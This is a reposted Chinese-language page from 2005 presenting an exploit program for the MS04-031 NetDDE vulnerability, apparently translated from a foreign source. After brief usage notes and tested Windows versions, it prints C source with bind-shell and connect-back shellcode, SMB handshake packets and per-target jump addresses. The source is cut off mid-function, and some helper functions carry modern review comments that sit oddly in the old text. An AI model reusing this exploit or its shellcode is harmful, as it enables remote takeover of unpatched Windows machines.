标题:MS04031漏洞漏洞程序演示版
时间:2005-1-2 来源:不详 浏览数:

翻译:小花  来自:http://xiaohuar.blogchina.com/

我从国外网站找到的,把英文简单翻译了一下,用我的话,呵呵。

此程序是MS04031的漏洞利用程序,成功利用此漏洞可以完全控制目标系统,获得管理权限。

程序是针对MS NETDDE的攻击程序。

但是因为该服务默认情况下是关闭的,所以我们能远程利用该漏洞的成功率很小。

然而,这为我们本地权限提升提供了一个很好的方式。

如何防范:

请用户尽快打补丁: 
*  http://www.microsoft.com/technet/security/Bulletin/MS04-031.mspx 

 

Tested on: 
*    - Windows XP Professional SP0 
*    - Windows XP Professional SP1 
*    - Windows 2000 Professional SP2 
*    - Windows 2000 Professional SP3 
*    - Windows 2000 Professional SP4 
*    - Windows 2000 Advanced Server SP4 
 

程序使用许可

这是一个演示版本,只有被授权的用户才能使用它(跟我们没关系,外国人和我们法律不一样啊)

命令行参数:

HOD-ms04031-expl.exe <host> <netbios name>  <target> <bindport> 
*                        [connectback IP] [options] 
 host 目标主机

netbios name这个我们开始是不清楚的,需要用到-f参数

首先 expl.exe 192.168.0.1 -f

得到netbios name

target 目标系统版本 慢慢试,不过2000和XP应该很好区分

bindport 目标打开端口,用于我们连接用,也可以反向连接,不再介绍。

 

代码如下:
 

/* #define _WIN32 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
 
#ifdef _WIN32 
#include <winsock2.h> 
#pragma comment(lib, "ws2_32") 
#else 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#endif 
 
 
/* targets table */ 
struct targets { 
int num; 
char name[50]; 
long jmpaddr; 

target[]= { 
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 }, 
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 } 
}; 
 
 
/* portbind shellcode */ 
unsigned char portbindsc[] =  
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" 
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" 
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" 
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" 
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" 
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" 
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" 
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" 
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" 
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70" 
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6" 
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e" 
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83" 
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32" 
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59" 
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50" 
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50" 
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14" 
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc" 
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c" 
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33" 
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44" 
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d" 
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50" 
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55" 
"\x28\xff\x55\x0c"; 
 
 
/* connectback shellcode */ 
unsigned char connectbacksc[] =  
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" 
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" 
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" 
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" 
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" 
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" 
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" 
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" 
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" 
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" 
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" 
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" 
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" 
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" 
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" 
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" 
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" 
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" 
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" 
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" 
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" 
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" 
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" 
"\x77\x38\xff\x55\x20\xff\x55\x0c"; 
 
 
#define SET_PORTBIND_PORT(buf, port) *(unsigned 
short *)(((buf)+300)) = (port) 
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned 
long  *)(((buf)+283)) = (ip) 
#define SET_CONNECTBACK_PORT(buf, port)
*(unsigned short *)(((buf)+290)) = (port) 
 
 
/*  
   eax = target[].jmpaddr -> stack -> jmpcode -> shellcode 
 
   1. 0100D605   call        dword ptr [eax+20h] 
   2. jmpcode 
   3. shellcode 
*/ 
 
char jmpcode[] = 
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90" 
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28" 
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72" 
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30" 
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e" 
"\xBB\xBB\xBB\xBB" /* => eax */ 
"PADPAD"; 
 
char smb_sesreq[] = 
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45" 
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43" 
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45" 
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" 
"\x41\x43\x41\x43\x41\x41\x41\x00"; 
 
char smb_negotiate[] = 
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02" 
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e" 
"\x31\x32\x00"; 
 
char d1[] = 
"\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a" 
"\x16\x02\x17\x0e\x1b\x0d"; 
 
char req1[] = 
"\x81\x00\x00\x44"; 
 
char req2[] = 
"CACACACACACACACACACACACACACACABP"; 
 
char h1[] = 
"\x45\x44\x44\x4E\x00\x00\x00"; 
 
char h2[] = 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
 
char h3[] = 
"\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00"; 
 
 
/* Module-wide state.  The code that assigns these is not on this page,
   so the notes below are inferred from the names and the macros above —
   confirm against the rest of the file. */
unsigned long ndlen = 0;      /* NOTE(review): meaning not visible here; looks like a length — confirm */
unsigned long ntarget = 0;    /* presumably an index into target[] above; verify against the caller */
unsigned long backip = 0;     /* presumably the value handed to SET_CONNECTBACK_IP; confirm */
unsigned short bindport = 0;  /* presumably the value handed to SET_PORTBIND_PORT; confirm */
 
 
 
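/*
 * Read a 32-bit little-endian value from data[i .. i+3].
 *
 * The original shifted the int-promoted byte left by 24, which is
 * undefined behaviour whenever data[i+3] >= 0x80.  Each byte is now
 * widened to unsigned long before shifting, so the result is well
 * defined on every platform.
 *
 * data: byte buffer; the caller must guarantee that i+3 is in bounds
 *       (no length is passed, so nothing can be checked here).
 * i:    byte offset of the least-significant byte.
 * Returns the decoded value (always fits in 32 bits).
 */
unsigned long
fixx(unsigned char *data, unsigned long i)
{
    return ((unsigned long)data[i + 3] << 24) |
           ((unsigned long)data[i + 2] << 16) |
           ((unsigned long)data[i + 1] << 8) |
           (unsigned long)data[i];
}


/*
 * Additive checksum over data[0 .. dlen-1], seeded with 0xFFFFFFFF.
 *
 * Whole 32-bit little-endian words are summed while the word offset is
 * below dlen - 4; the remaining bytes (at least four of them when
 * dlen >= 4) are then added one at a time.  That layout is kept exactly
 * as in the original, since whatever consumes this sum presumably
 * expects it.
 *
 * Fix: for dlen < 4 the original computed "dlen - 4" in unsigned
 * arithmetic, wrapped to a huge value and read far past the buffer.
 * Such inputs now skip the word loop and are summed byte by byte.
 *
 * NOTE(review): unsigned long is 64 bits on LP64 platforms, so the sum
 * is not truncated to 32 bits there, unlike on 32-bit Windows builds —
 * confirm whether the consumer of this value cares.
 *
 * data: byte buffer holding at least dlen bytes.
 * dlen: number of bytes to sum.
 * Returns the checksum.
 */
unsigned long
chksum(unsigned char *data, unsigned long dlen)
{
    unsigned long chk = 0xFFFFFFFF;
    unsigned long i = 0;

    if (dlen >= 4) {
        unsigned long wlen = dlen - 4;
        for (i = 0; i < wlen; i += 4) {
            chk += fixx(data, i);
        }
    }

    /* Trailing bytes (and the whole input when dlen < 4). */
    while (i < dlen) {
        chk += data[i];
        i++;
    }

    return chk;
}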
 
 
char * 
netbios_encode(char *ndata, char service) 

char *tmpdata, *data, *nret; 
unsigned long dlen; 
char odiv, omod, o; 
int i; 
 
data = (char *)calloc(17, 1); 
memcpy(data, ndata, strlen(ndata)); 
 
dlen = strlen(data); 
while (dlen < 15) { 
strcat(data, "\x20"); 


